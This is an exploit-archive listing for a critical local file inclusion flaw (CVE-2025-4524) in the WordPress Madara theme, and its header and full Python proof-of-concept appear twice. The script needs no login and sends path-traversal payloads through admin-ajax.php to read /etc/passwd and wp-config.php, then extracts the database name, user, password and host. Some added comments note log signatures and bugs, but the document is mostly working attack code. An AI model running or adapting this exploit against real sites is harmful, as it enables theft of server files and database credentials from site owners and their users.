9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
This Python script exploits a local file inclusion vulnerability in the WordPress Madara theme. It interacts with the admin-ajax.php endpoint to load sensitive files from the server, potentially leading to the exposure of system or application data. It...
Basic Information
ID
PACKETSTORM:220776
Published
May 11, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : WordPress Madara 2.2.2 Local File Inclusion Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://mangabooth.com/product/wp-manga-theme-madara/ |
==================================================================================================================================
[+] Summary : This Python script exploits a Local File Inclusion (CVE-2025-4524) vulnerability in the WordPress Madara theme.
It interacts with the admin-ajax.php endpoint to load sensitive files from the server, potentially leading to the exposure of system or application data.
[+] POC :
import requests
import sys
import re
class MadaraLFIExploit:
    """Proof-of-concept client for the Madara theme LFI (CVE-2025-4524).

    Every request in this class goes to ``/wp-admin/admin-ajax.php`` with
    ``action=madara_load_more``; the path traversal is carried in the
    ``template`` POST field.  For defenders that pair -- the
    ``madara_load_more`` action together with ``../`` sequences in
    ``template`` -- is the observable signature of this PoC in web-server
    or WAF logs.  No login step exists anywhere in the class (the listing's
    CVSS vector is PR:N); the remediation is the vendor's patched release.
    """

    def __init__(self, target: str) -> None:
        """Store the site base URL (trailing slash removed) and open a session.

        target: scheme and host[:port] of the WordPress site, as passed on
            the command line.
        """
        self.target = target.rstrip('/')
        # All traffic from this class hits this single endpoint.
        self.ajax_url = f"{self.target}/wp-admin/admin-ajax.php"
        self.session = requests.Session()

    def read_file(self, filepath: str) -> str | None:
        """Request one server-side file through the vulnerable AJAX action.

        filepath: absolute server path (e.g. /etc/passwd) or a relative
            traversal string; it is appended verbatim to the
            ``plugins/../../../../../../..`` prefix of the ``template`` field.
        Returns the raw response body when the server answers 200 with more
        than 50 characters, otherwise None.  Any exception raised by the
        request is printed and reported as None.
        """
        payload = {
            'action': 'madara_load_more',
            'page': '1',
            # The traversal vector.  Seven ".." segments after "plugins/" are
            # presumably enough to climb from the theme's template directory
            # to the filesystem root before filepath is appended -- TODO
            # confirm against the theme's include path.
            'template': f'plugins/../../../../../../..{filepath}',
            # The vars[...] fields look like the theme's normal "load more"
            # query parameters; presumably the handler needs them to reach
            # the template include -- verify against the theme's front-end.
            'vars[orderby]': 'meta_value_num',
            'vars[paged]': '1',
            'vars[timerange]': '',
            'vars[posts_per_page]': '16',
            'vars[tax_query][relation]': 'OR',
            'vars[meta_query][0][relation]': 'AND',
            'vars[meta_query][relation]': 'AND',
            'vars[post_type]': 'wp-manga',
            'vars[post_status]': 'publish',
            'vars[meta_key]': '_latest_update',
            'vars[order]': 'desc',
            'vars[sidebar]': 'right',
            'vars[manga_archives_item_layout]': 'big_thumbnail'
        }
        headers = {
            # Non-standard UA string ("indoushka" in the platform token) --
            # a usable fingerprint when searching access logs for this PoC.
            'User-Agent': 'Mozilla/5.0 (indoushka; rv:128.0) Gecko/20100101 Firefox/128.0',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            # The header a browser XHR call would send to admin-ajax.php.
            'X-Requested-With': 'XMLHttpRequest'
        }
        try:
            response = self.session.post(
                self.ajax_url,
                data=payload,
                headers=headers,
                timeout=10
            )
            # Success heuristic only: a 200 with a body over 50 characters is
            # treated as file content.  A theme error page or an ordinary
            # "load more" HTML fragment also satisfies this, so callers check
            # for content markers (root:, DB_NAME) themselves.
            if response.status_code == 200 and len(response.text) > 50:
                return response.text
            else:
                return None
        except Exception as e:
            # Broad catch: connection errors, timeouts and any other failure
            # collapse into a printed message plus None.
            print(f"[-] Error: {e}")
            return None

    def read_config_file(self) -> str | None:
        """Try several spellings of the wp-config.php path and print DB settings.

        Returns the response body of the first attempt that contains both
        DB_NAME and DB_PASSWORD, otherwise None.
        """
        paths = [
            '/wp-config.php',
            '/../wp-config.php',
            # NOTE(review): entries without a leading '/' are appended directly
            # after the final '..' of read_file's template prefix, so the joined
            # string contains a '..../' segment rather than two traversal steps.
            '../../wp-config.php',
            '../../../wp-config.php'
        ]
        for path in paths:
            print(f"[*] Trying: {path}")
            content = self.read_file(path)
            if content and 'DB_NAME' in content and 'DB_PASSWORD' in content:
                print("[+] Found wp-config.php!")
                # Only single-quoted define('KEY', 'value') lines match;
                # double-quoted constants are not extracted.
                db_patterns = {
                    'DB_NAME': r"define\s*\(\s*'DB_NAME'\s*,\s*'([^']+)'",
                    'DB_USER': r"define\s*\(\s*'DB_USER'\s*,\s*'([^']+)'",
                    'DB_PASSWORD': r"define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'",
                    'DB_HOST': r"define\s*\(\s*'DB_HOST'\s*,\s*'([^']+)'"
                }
                for key, pattern in db_patterns.items():
                    match = re.search(pattern, content)
                    if match:
                        print(f"[+] {key}: {match.group(1)}")
                return content
        return None

    def find_indoushka(self) -> str | None:
        """Look for a flag-style marker ("indoushka{...}") in candidate files.

        First pass: read each path in ``common_files`` and return the first
        regex hit.  Second pass: read a few WordPress files and print the
        first 500 characters of any whose lower-cased body contains
        "indoushka".  The second pass never returns a match; the method
        returns None after it.
        """
        common_files = [
            '/indoushka.txt',
            '/root/indoushka.txt',
            '/home/indoushka/indoushka.txt',
            '/var/www/indoushka.txt',
            '/tmp/indoushka.txt',
            '../../../indoushka.txt',
            '../../../../indoushka.txt'
        ]
        for filepath in common_files:
            print(f"[*] Checking {filepath}")
            content = self.read_file(filepath)
            if content:
                patterns = [
                    # NOTE(review): the first three patterns are identical.
                    r'indoushka\{[^}]+\}',
                    r'indoushka\{[^}]+\}',
                    r'indoushka\{[^}]+\}',
                    r'\{FLG:[^}]+\}',
                    # Any run of 32+ upper-case alphanumerics or lower-case hex
                    # also matches, so a hash or token in an unrelated file is
                    # reported as a "find".
                    r'[A-Z0-9]{32,}',
                    r'[a-f0-9]{32,}'
                ]
                for pattern in patterns:
                    matches = re.findall(pattern, content)
                    if matches:
                        print(f"[YEP] indoushka FOUND: {matches[0]}")
                        return matches[0]
        print("[*] Trying to read sensitive WordPress files...")
        wp_files = [
            '/wp-config.php',
            '/wp-content/plugins/madara/functions.php',
            '/wp-content/themes/madara/style.css'
        ]
        for wp_file in wp_files:
            content = self.read_file(wp_file)
            # NOTE(review): both halves of the `or` are the same test.
            if content and ('indoushka' in content.lower() or 'indoushka' in content.lower()):
                print(f"[+] Interesting content in {wp_file}:")
                print(content[:500])
        return None
if __name__ == "__main__":
    # One optional positional argument: the site base URL.  Falls back to a
    # local test instance when none is given.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"
    exploit = MadaraLFIExploit(target)
    print("[*] Testing LFI vulnerability...")
    # Vulnerability check: a response body containing "root:" is taken as
    # proof that /etc/passwd was returned.
    test_content = exploit.read_file('/etc/passwd')
    if test_content and 'root:' in test_content:
        print("[+] LFI confirmed! /etc/passwd read successfully")
        print("\n[*] Searching for indoushka...")
        indoushka = exploit.find_indoushka()
        if not indoushka:
            print("[*] Trying to read database config...")
            exploit.read_config_file()
    else:
        # Second check, presumably for hosts where /etc/passwd is absent or
        # blocked: look for wp-config.php via a relative traversal instead.
        print("[-] LFI might not work. Trying alternative payload...")
        test_content = exploit.read_file('../../../wp-config.php')
        if test_content and 'DB_NAME' in test_content:
            print("[+] LFI confirmed via wp-config.php!")
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : WordPress Madara 2.2.2 Local File Inclusion Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://mangabooth.com/product/wp-manga-theme-madara/ |
==================================================================================================================================
[+] Summary : This Python script exploits a Local File Inclusion (CVE-2025-4524) vulnerability in the WordPress Madara theme.
It interacts with the admin-ajax.php endpoint to load sensitive files from the server, potentially leading to the exposure of system or application data.
[+] POC :
import requests
import sys
import re
class MadaraLFIExploit:
    """Proof-of-concept client for the Madara theme LFI (CVE-2025-4524).

    Every request in this class goes to ``/wp-admin/admin-ajax.php`` with
    ``action=madara_load_more``; the path traversal is carried in the
    ``template`` POST field.  For defenders that pair -- the
    ``madara_load_more`` action together with ``../`` sequences in
    ``template`` -- is the observable signature of this PoC in web-server
    or WAF logs.  No login step exists anywhere in the class (the listing's
    CVSS vector is PR:N); the remediation is the vendor's patched release.
    """

    def __init__(self, target: str) -> None:
        """Store the site base URL (trailing slash removed) and open a session.

        target: scheme and host[:port] of the WordPress site, as passed on
            the command line.
        """
        self.target = target.rstrip('/')
        # All traffic from this class hits this single endpoint.
        self.ajax_url = f"{self.target}/wp-admin/admin-ajax.php"
        self.session = requests.Session()

    def read_file(self, filepath: str) -> str | None:
        """Request one server-side file through the vulnerable AJAX action.

        filepath: absolute server path (e.g. /etc/passwd) or a relative
            traversal string; it is appended verbatim to the
            ``plugins/../../../../../../..`` prefix of the ``template`` field.
        Returns the raw response body when the server answers 200 with more
        than 50 characters, otherwise None.  Any exception raised by the
        request is printed and reported as None.
        """
        payload = {
            'action': 'madara_load_more',
            'page': '1',
            # The traversal vector.  Seven ".." segments after "plugins/" are
            # presumably enough to climb from the theme's template directory
            # to the filesystem root before filepath is appended -- TODO
            # confirm against the theme's include path.
            'template': f'plugins/../../../../../../..{filepath}',
            # The vars[...] fields look like the theme's normal "load more"
            # query parameters; presumably the handler needs them to reach
            # the template include -- verify against the theme's front-end.
            'vars[orderby]': 'meta_value_num',
            'vars[paged]': '1',
            'vars[timerange]': '',
            'vars[posts_per_page]': '16',
            'vars[tax_query][relation]': 'OR',
            'vars[meta_query][0][relation]': 'AND',
            'vars[meta_query][relation]': 'AND',
            'vars[post_type]': 'wp-manga',
            'vars[post_status]': 'publish',
            'vars[meta_key]': '_latest_update',
            'vars[order]': 'desc',
            'vars[sidebar]': 'right',
            'vars[manga_archives_item_layout]': 'big_thumbnail'
        }
        headers = {
            # Non-standard UA string ("indoushka" in the platform token) --
            # a usable fingerprint when searching access logs for this PoC.
            'User-Agent': 'Mozilla/5.0 (indoushka; rv:128.0) Gecko/20100101 Firefox/128.0',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            # The header a browser XHR call would send to admin-ajax.php.
            'X-Requested-With': 'XMLHttpRequest'
        }
        try:
            response = self.session.post(
                self.ajax_url,
                data=payload,
                headers=headers,
                timeout=10
            )
            # Success heuristic only: a 200 with a body over 50 characters is
            # treated as file content.  A theme error page or an ordinary
            # "load more" HTML fragment also satisfies this, so callers check
            # for content markers (root:, DB_NAME) themselves.
            if response.status_code == 200 and len(response.text) > 50:
                return response.text
            else:
                return None
        except Exception as e:
            # Broad catch: connection errors, timeouts and any other failure
            # collapse into a printed message plus None.
            print(f"[-] Error: {e}")
            return None

    def read_config_file(self) -> str | None:
        """Try several spellings of the wp-config.php path and print DB settings.

        Returns the response body of the first attempt that contains both
        DB_NAME and DB_PASSWORD, otherwise None.
        """
        paths = [
            '/wp-config.php',
            '/../wp-config.php',
            # NOTE(review): entries without a leading '/' are appended directly
            # after the final '..' of read_file's template prefix, so the joined
            # string contains a '..../' segment rather than two traversal steps.
            '../../wp-config.php',
            '../../../wp-config.php'
        ]
        for path in paths:
            print(f"[*] Trying: {path}")
            content = self.read_file(path)
            if content and 'DB_NAME' in content and 'DB_PASSWORD' in content:
                print("[+] Found wp-config.php!")
                # Only single-quoted define('KEY', 'value') lines match;
                # double-quoted constants are not extracted.
                db_patterns = {
                    'DB_NAME': r"define\s*\(\s*'DB_NAME'\s*,\s*'([^']+)'",
                    'DB_USER': r"define\s*\(\s*'DB_USER'\s*,\s*'([^']+)'",
                    'DB_PASSWORD': r"define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'",
                    'DB_HOST': r"define\s*\(\s*'DB_HOST'\s*,\s*'([^']+)'"
                }
                for key, pattern in db_patterns.items():
                    match = re.search(pattern, content)
                    if match:
                        print(f"[+] {key}: {match.group(1)}")
                return content
        return None

    def find_indoushka(self) -> str | None:
        """Look for a flag-style marker ("indoushka{...}") in candidate files.

        First pass: read each path in ``common_files`` and return the first
        regex hit.  Second pass: read a few WordPress files and print the
        first 500 characters of any whose lower-cased body contains
        "indoushka".  The second pass never returns a match; the method
        returns None after it.
        """
        common_files = [
            '/indoushka.txt',
            '/root/indoushka.txt',
            '/home/indoushka/indoushka.txt',
            '/var/www/indoushka.txt',
            '/tmp/indoushka.txt',
            '../../../indoushka.txt',
            '../../../../indoushka.txt'
        ]
        for filepath in common_files:
            print(f"[*] Checking {filepath}")
            content = self.read_file(filepath)
            if content:
                patterns = [
                    # NOTE(review): the first three patterns are identical.
                    r'indoushka\{[^}]+\}',
                    r'indoushka\{[^}]+\}',
                    r'indoushka\{[^}]+\}',
                    r'\{FLG:[^}]+\}',
                    # Any run of 32+ upper-case alphanumerics or lower-case hex
                    # also matches, so a hash or token in an unrelated file is
                    # reported as a "find".
                    r'[A-Z0-9]{32,}',
                    r'[a-f0-9]{32,}'
                ]
                for pattern in patterns:
                    matches = re.findall(pattern, content)
                    if matches:
                        print(f"[YEP] indoushka FOUND: {matches[0]}")
                        return matches[0]
        print("[*] Trying to read sensitive WordPress files...")
        wp_files = [
            '/wp-config.php',
            '/wp-content/plugins/madara/functions.php',
            '/wp-content/themes/madara/style.css'
        ]
        for wp_file in wp_files:
            content = self.read_file(wp_file)
            # NOTE(review): both halves of the `or` are the same test.
            if content and ('indoushka' in content.lower() or 'indoushka' in content.lower()):
                print(f"[+] Interesting content in {wp_file}:")
                print(content[:500])
        return None
if __name__ == "__main__":
    # One optional positional argument: the site base URL.  Falls back to a
    # local test instance when none is given.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"
    exploit = MadaraLFIExploit(target)
    print("[*] Testing LFI vulnerability...")
    # Vulnerability check: a response body containing "root:" is taken as
    # proof that /etc/passwd was returned.
    test_content = exploit.read_file('/etc/passwd')
    if test_content and 'root:' in test_content:
        print("[+] LFI confirmed! /etc/passwd read successfully")
        print("\n[*] Searching for indoushka...")
        indoushka = exploit.find_indoushka()
        if not indoushka:
            print("[*] Trying to read database config...")
            exploit.read_config_file()
    else:
        # Second check, presumably for hosts where /etc/passwd is absent or
        # blocked: look for wp-config.php via a relative traversal instead.
        print("[-] LFI might not work. Trying alternative payload...")
        test_content = exploit.read_file('../../../wp-config.php')
        if test_content and 'DB_NAME' in test_content:
            print("[+] LFI confirmed via wp-config.php!")
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================